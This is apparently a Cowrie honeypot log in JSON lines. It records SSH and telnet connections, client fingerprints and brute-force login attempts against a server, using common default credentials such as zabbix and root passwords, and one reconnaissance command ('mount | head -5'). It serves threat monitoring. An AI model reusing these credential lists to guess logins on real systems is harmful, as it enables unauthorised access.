{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:15:11.076679Z","src_ip":"212.227.125.160","session":"49db4f378810"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"12345678","message":"login attempt [zabbix/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T07:15:12.687340Z","src_ip":"212.227.125.160","session":"49db4f378810"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:15:14.471652Z","src_ip":"212.227.125.160","session":"49db4f378810"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54049,"dst_ip":"1.2.3.4","dst_port":23,"session":"fc4f84c68164","protocol":"telnet","message":"New connection: 212.227.125.160:54049 (1.2.3.4:23) [session: fc4f84c68164]","sensor":"my-vps","timestamp":"2025-08-31T07:15:21.265033Z"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":43830,"dst_ip":"1.2.3.4","dst_port":22,"session":"c09416515c23","protocol":"ssh","message":"New connection: 102.210.148.92:43830 (1.2.3.4:22) [session: c09416515c23]","sensor":"my-vps","timestamp":"2025-08-31T07:15:28.388949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:15:28.390291Z","src_ip":"102.210.148.92","session":"c09416515c23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:15:28.564806Z","src_ip":"102.210.148.92","session":"c09416515c23"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"test","message":"login attempt [oracle/test] failed","sensor":"my-vps","timestamp":"2025-08-31T07:15:29.265585Z","src_ip":"102.210.148.92","session":"c09416515c23"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:15:30.443589Z","src_ip":"102.210.148.92","session":"c09416515c23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50060,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0cdb5c8e081","protocol":"telnet","message":"New connection: 212.227.235.229:50060 (1.2.3.4:23) [session: b0cdb5c8e081]","sensor":"my-vps","timestamp":"2025-08-31T07:15:37.360580Z"}
{"eventid":"cowrie.session.closed","duration":10.000932931900024,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:15:47.361443Z","src_ip":"212.227.235.229","session":"b0cdb5c8e081"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46758,"dst_ip":"1.2.3.4","dst_port":22,"session":"c22257a5d680","protocol":"ssh","message":"New connection: 212.227.235.229:46758 (1.2.3.4:22) [session: c22257a5d680]","sensor":"my-vps","timestamp":"2025-08-31T07:15:47.819993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:15:48.539984Z","src_ip":"212.227.235.229","session":"c22257a5d680"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:15:48.540738Z","src_ip":"212.227.235.229","session":"c22257a5d680"}
{"eventid":"cowrie.login.success","username":"root","password":"pgj-heu05HQM=bMvz","message":"login attempt [root/pgj-heu05HQM=bMvz] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:15:52.725296Z","src_ip":"212.227.125.160","session":"c02fb2332ce3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:15:52.752793Z","src_ip":"212.227.125.160","session":"c02fb2332ce3"}
{"eventid":"cowrie.session.closed","duration":31.559079885482788,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:15:52.824050Z","src_ip":"212.227.125.160","session":"fc4f84c68164"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456789","message":"login attempt [zabbix/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T07:15:54.001508Z","src_ip":"212.227.235.229","session":"c22257a5d680"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:15:55.877042Z","src_ip":"212.227.235.229","session":"c22257a5d680"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34608,"dst_ip":"1.2.3.4","dst_port":23,"session":"e532e9b0384c","protocol":"telnet","message":"New connection: 212.227.125.160:34608 (1.2.3.4:23) [session: e532e9b0384c]","sensor":"my-vps","timestamp":"2025-08-31T07:15:56.131799Z"}
{"eventid":"cowrie.session.closed","duration":10.000408411026001,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:16:06.132141Z","src_ip":"212.227.125.160","session":"e532e9b0384c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37110,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcb402883af7","protocol":"ssh","message":"New connection: 212.227.125.160:37110 (1.2.3.4:22) [session: dcb402883af7]","sensor":"my-vps","timestamp":"2025-08-31T07:16:08.896595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:16:09.503715Z","src_ip":"212.227.125.160","session":"dcb402883af7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:16:09.505003Z","src_ip":"212.227.125.160","session":"dcb402883af7"}
{"eventid":"cowrie.session.connect","src_ip":"119.193.158.20","src_port":49830,"dst_ip":"1.2.3.4","dst_port":23,"session":"179c43d71ae0","protocol":"telnet","message":"New connection: 119.193.158.20:49830 (1.2.3.4:23) [session: 179c43d71ae0]","sensor":"my-vps","timestamp":"2025-08-31T07:16:10.868686Z"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456789","message":"login attempt [zabbix/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T07:16:12.265819Z","src_ip":"212.227.125.160","session":"dcb402883af7"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:16:13.775149Z","src_ip":"212.227.125.160","session":"dcb402883af7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53035,"dst_ip":"1.2.3.4","dst_port":22,"session":"0043267c3590","protocol":"ssh","message":"New connection: 212.227.235.229:53035 (1.2.3.4:22) [session: 0043267c3590]","sensor":"my-vps","timestamp":"2025-08-31T07:16:17.139630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:16:26.511487Z","src_ip":"212.227.235.229","session":"0043267c3590"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:16:26.512364Z","src_ip":"212.227.235.229","session":"0043267c3590"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53368,"dst_ip":"1.2.3.4","dst_port":23,"session":"9b3248dc9c14","protocol":"telnet","message":"New connection: 212.227.235.229:53368 (1.2.3.4:23) [session: 9b3248dc9c14]","sensor":"my-vps","timestamp":"2025-08-31T07:16:34.651325Z"}
{"eventid":"cowrie.session.closed","duration":31.386943578720093,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:16:42.255540Z","src_ip":"119.193.158.20","session":"179c43d71ae0"}
{"eventid":"cowrie.session.connect","src_ip":"102.210.148.92","src_port":55076,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ef2faee08be","protocol":"ssh","message":"New connection: 102.210.148.92:55076 (1.2.3.4:22) [session: 0ef2faee08be]","sensor":"my-vps","timestamp":"2025-08-31T07:16:44.079262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T07:16:44.080187Z","src_ip":"102.210.148.92","session":"0ef2faee08be"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T07:16:44.256563Z","src_ip":"102.210.148.92","session":"0ef2faee08be"}
{"eventid":"cowrie.session.closed","duration":10.196097135543823,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:16:44.847337Z","src_ip":"212.227.235.229","session":"9b3248dc9c14"}
{"eventid":"cowrie.login.failed","username":"dell","password":"abcd-1234","message":"login attempt [dell/abcd-1234] failed","sensor":"my-vps","timestamp":"2025-08-31T07:16:45.003462Z","src_ip":"102.210.148.92","session":"0ef2faee08be"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:16:46.185024Z","src_ip":"102.210.148.92","session":"0ef2faee08be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53500,"dst_ip":"1.2.3.4","dst_port":22,"session":"37ed78bbcb90","protocol":"ssh","message":"New connection: 212.227.235.229:53500 (1.2.3.4:22) [session: 37ed78bbcb90]","sensor":"my-vps","timestamp":"2025-08-31T07:16:46.435928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:16:47.153340Z","src_ip":"212.227.235.229","session":"37ed78bbcb90"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:16:47.165853Z","src_ip":"212.227.235.229","session":"37ed78bbcb90"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"password","message":"login attempt [zabbix/password] failed","sensor":"my-vps","timestamp":"2025-08-31T07:16:52.823185Z","src_ip":"212.227.235.229","session":"37ed78bbcb90"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:16:54.717317Z","src_ip":"212.227.235.229","session":"37ed78bbcb90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60526,"dst_ip":"1.2.3.4","dst_port":23,"session":"ce5ce934b1f5","protocol":"telnet","message":"New connection: 212.227.125.160:60526 (1.2.3.4:23) [session: ce5ce934b1f5]","sensor":"my-vps","timestamp":"2025-08-31T07:16:56.182517Z"}
{"eventid":"cowrie.session.closed","duration":10.14871335029602,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:17:06.330317Z","src_ip":"212.227.125.160","session":"ce5ce934b1f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43208,"dst_ip":"1.2.3.4","dst_port":22,"session":"7586f0cb25f7","protocol":"ssh","message":"New connection: 212.227.125.160:43208 (1.2.3.4:22) [session: 7586f0cb25f7]","sensor":"my-vps","timestamp":"2025-08-31T07:17:07.546954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:17:08.123381Z","src_ip":"212.227.125.160","session":"7586f0cb25f7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T07:17:08.124450Z","src_ip":"212.227.125.160","session":"7586f0cb25f7"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"password","message":"login attempt [zabbix/password] failed","sensor":"my-vps","timestamp":"2025-08-31T07:17:10.133685Z","src_ip":"212.227.125.160","session":"7586f0cb25f7"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:17:11.636613Z","src_ip":"212.227.125.160","session":"7586f0cb25f7"}
{"eventid":"cowrie.login.success","username":"root","password":"Madison1*","message":"login attempt [root/Madison1*] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:17:27.099495Z","src_ip":"212.227.235.229","session":"0043267c3590"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38014,"dst_ip":"1.2.3.4","dst_port":23,"session":"f4f21a666909","protocol":"telnet","message":"New connection: 212.227.235.229:38014 (1.2.3.4:23) [session: f4f21a666909]","sensor":"my-vps","timestamp":"2025-08-31T07:17:30.581603Z"}
{"eventid":"cowrie.session.closed","duration":0.001306295394897461,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:17:30.582832Z","src_ip":"212.227.235.229","session":"f4f21a666909"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56114,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ff4d13159ba","protocol":"ssh","message":"New connection: 217.72.205.35:56114 (1.2.3.4:22) [session: 8ff4d13159ba]","sensor":"my-vps","timestamp":"2025-08-31T07:17:40.253262Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:17:40.254583Z","src_ip":"217.72.205.35","session":"8ff4d13159ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41560,"dst_ip":"1.2.3.4","dst_port":23,"session":"b4dfa4172d80","protocol":"telnet","message":"New connection: 212.227.125.160:41560 (1.2.3.4:23) [session: b4dfa4172d80]","sensor":"my-vps","timestamp":"2025-08-31T07:17:43.959503Z"}
{"eventid":"cowrie.session.closed","duration":0.0025374889373779297,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:17:43.961941Z","src_ip":"212.227.125.160","session":"b4dfa4172d80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59076,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dd3d0007112","protocol":"ssh","message":"New connection: 212.227.235.229:59076 (1.2.3.4:22) [session: 1dd3d0007112]","sensor":"my-vps","timestamp":"2025-08-31T07:17:45.439177Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:17:46.245175Z","src_ip":"212.227.235.229","session":"0043267c3590"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T07:17:46.245907Z","src_ip":"212.227.235.229","session":"0043267c3590"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:17:46.640020Z","src_ip":"212.227.235.229","session":"1dd3d0007112"}
